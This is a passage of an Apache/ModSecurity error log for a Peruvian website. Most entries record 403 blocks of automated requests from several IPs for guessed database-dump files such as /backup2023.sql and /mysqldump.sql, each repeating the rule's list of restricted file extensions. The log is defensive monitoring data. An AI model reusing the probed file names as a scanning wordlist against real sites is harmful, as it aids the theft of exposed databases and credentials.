forbidden by Options directive [Sun Jul 07 03:35:21.565045 2024] [ssl:warn] [pid 30389:tid 140666667853696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 07 03:35:29.783985 2024] [ssl:warn] [pid 30390:tid 140666667853696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 07 03:35:30.349374 2024] [ssl:warn] [pid 30390:tid 140666667853696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 07 03:35:32.071736 2024] [ssl:warn] [pid 30390:tid 140666667853696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 07 03:35:34.357290 2024] [ssl:warn] [pid 30805:tid 139722924046208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 07 03:35:42.595189 2024] [ssl:warn] [pid 30806:tid 139722924046208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 07 10:14:43.632554 2024] [:error] [pid 30828:tid 139722634540800] [client 185.220.101.88:33046] [client 185.220.101.88] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/nperu_2023.sql"] [unique_id "Zoqw4zbJWLg2ecbngu9HtAAAAIQ"] [Sun Jul 07 10:14:44.318882 2024] [:error] [pid 31926:tid 139722559006464] [client 205.185.116.34:33048] [client 205.185.116.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/setup.sql"] [unique_id "Zoqw5Hug2jzbr_AlO3dxlAAAAM0"] [Sun Jul 07 10:14:45.120434 2024] [:error] [pid 31926:tid 139722542221056] [client 205.185.116.34:33050] [client 205.185.116.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-estigacionperu.sql"] [unique_id "Zoqw5Xug2jzbr_AlO3dxlQAAAM8"] [Sun Jul 07 10:14:45.930286 2024] [:error] [pid 31926:tid 139722508650240] [client 205.185.116.34:33052] [client 205.185.116.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vestigacionperu-2023.sql"] [unique_id "Zoqw5Xug2jzbr_AlO3dxlgAAANM"] [Sun Jul 07 10:14:46.691173 2024] [:error] [pid 31926:tid 139722517042944] [client 205.185.116.34:33054] [client 205.185.116.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/buck.sql"] [unique_id "Zoqw5nug2jzbr_AlO3dxlwAAANI"] [Sun Jul 07 10:14:47.585598 2024] [:error] [pid 30828:tid 139722600969984] [client 205.185.116.34:33056] [client 205.185.116.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-nperu.sql"] [unique_id "Zoqw5zbJWLg2ecbngu9HtQAAAIg"] [Sun Jul 07 10:14:48.212539 2024] [:error] [pid 30827:tid 139722668111616] [client 205.185.116.34:33058] [client 205.185.116.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/members.sql"] [unique_id "Zoqw6EGuaLybMBNkB61tSAAAAEA"] [Sun Jul 07 10:14:49.572302 2024] [:error] [pid 31926:tid 139722500257536] [client 205.185.116.34:33060] [client 205.185.116.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup2023.sql"] [unique_id "Zoqw6Xug2jzbr_AlO3dxmAAAANQ"] [Sun Jul 07 10:14:50.789432 2024] [:error] [pid 31926:tid 139722466686720] [client 205.185.116.34:33062] [client 205.185.116.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/mysqldump.sql"] [unique_id "Zoqw6nug2jzbr_AlO3dxmQAAANg"] [Sun Jul 07 10:14:51.629503 2024] [:error] [pid 31926:tid 139722592577280] [client 205.185.116.34:33064] [client 205.185.116.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/tigacionperu-2022.sql"] [unique_id "Zoqw63ug2jzbr_AlO3dxmgAAAMk"] [Sun Jul 07 10:14:52.377758 2024] [:error] [pid 31926:tid 139722642933504] [client 205.185.116.34:33066] [client 205.185.116.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_tigacionperu.sql"] [unique_id "Zoqw7Hug2jzbr_AlO3dxmwAAAMM"] [Sun Jul 07 10:14:53.109395 2024] [:error] [pid 30826:tid 139722517042944] [client 205.185.116.34:33068] [client 205.185.116.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/tigacionperu-2023.sql"] [unique_id "Zoqw7fcO2IzqYGkif72oSwAAABI"] [Sun Jul 07 10:14:53.561857 2024] [:error] [pid 30828:tid 139722508650240] [client 23.154.177.24:33070] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/ru-2022.sql"] [unique_id "Zoqw7TbJWLg2ecbngu9HtgAAAJM"] [Sun Jul 07 10:14:54.034508 2024] [:error] [pid 30826:tid 139722475079424] [client 23.154.177.24:33072] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2020.sql"] [unique_id "Zoqw7vcO2IzqYGkif72oTAAAABc"] [Sun Jul 07 10:14:54.992116 2024] [:error] [pid 30826:tid 139722642933504] [client 23.154.177.24:33074] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/mysql_dump.sql"] [unique_id "Zoqw7vcO2IzqYGkif72oTQAAAAM"] [Sun Jul 07 10:14:55.460186 2024] [:error] [pid 30826:tid 139722651326208] [client 23.154.177.24:33076] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/peru-2023.sql"] [unique_id "Zoqw7_cO2IzqYGkif72oTgAAAAI"] [Sun Jul 07 10:14:55.858681 2024] [:error] [pid 30826:tid 139722634540800] [client 23.154.177.24:33078] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/nperu-2023.sql"] [unique_id "Zoqw7_cO2IzqYGkif72oTwAAAAQ"] [Sun Jul 07 10:14:56.303189 2024] [:error] [pid 31926:tid 139722659718912] [client 23.154.177.24:33080] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup_temp.sql"] [unique_id "Zoqw8Hug2jzbr_AlO3dxnAAAAME"] [Sun Jul 07 10:14:58.006857 2024] [:error] [pid 31926:tid 139722617755392] [client 23.154.177.24:33082] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-u.sql"] [unique_id "Zoqw8nug2jzbr_AlO3dxnQAAAMY"] [Sun Jul 07 10:14:58.495255 2024] [:error] [pid 30828:tid 139722525435648] [client 23.154.177.24:33084] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/eru-2022.sql"] [unique_id "Zoqw8jbJWLg2ecbngu9HtwAAAJE"] [Sun Jul 07 10:14:59.040913 2024] [:error] [pid 30828:tid 139722475079424] [client 23.154.177.24:33086] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-peru.sql"] [unique_id "Zoqw8zbJWLg2ecbngu9HuAAAAJc"] [Sun Jul 07 10:15:00.266934 2024] [:error] [pid 30828:tid 139722651326208] [client 23.154.177.24:33088] [client 23.154.177.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/static/dump.sql"] [unique_id 